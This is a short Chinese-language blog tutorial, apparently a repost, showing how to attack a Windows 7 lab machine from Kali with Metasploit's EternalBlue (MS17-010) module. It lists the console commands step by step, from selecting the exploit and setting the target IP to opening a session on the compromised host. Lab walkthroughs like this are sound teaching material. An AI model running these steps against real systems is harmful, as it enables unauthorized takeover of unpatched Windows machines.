metasploit 下利用永恒之藍攻擊靶機win7
阿新 • • 發佈:2019-01-20
png arc 攻擊機 直接 參數 windows exploit host 系統
實驗環境:一臺win7靶機,kali作為攻擊機
控制臺下輸入msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
接下來可以看一下受這個漏洞影響的操作系統
可以看出受影響的有兩個,分別是win7和server 2008 R2兩種操作系統(ps:這兩款靶機都可以自己搭建一下,我這裏使用的是win7)
show options 看一下需要設置的參數
可以看出我們需要設置RHOST 和RPORT 已經下面兩個required為 yes的參數
這裏只需設定一下靶機的IP地址即可,其余的參數默認就好
exploit 進行攻擊(-z是為了在成功攻擊目標後暫時不使用控制會話進行交互),也可以直接exploit,直接返回靶機的控制臺,簡單的按CTRL -Z命令將控制會話直接放到後臺運行,我這裏是為了更好地看一下sessions
sessions -l 查看所有的會話
sessions -i ID 啟用ID會話
接下來就直接進入到win7的控制臺
然後就可以進行下一步的各種操作了
metasploit 下利用永恒之藍攻擊靶機win7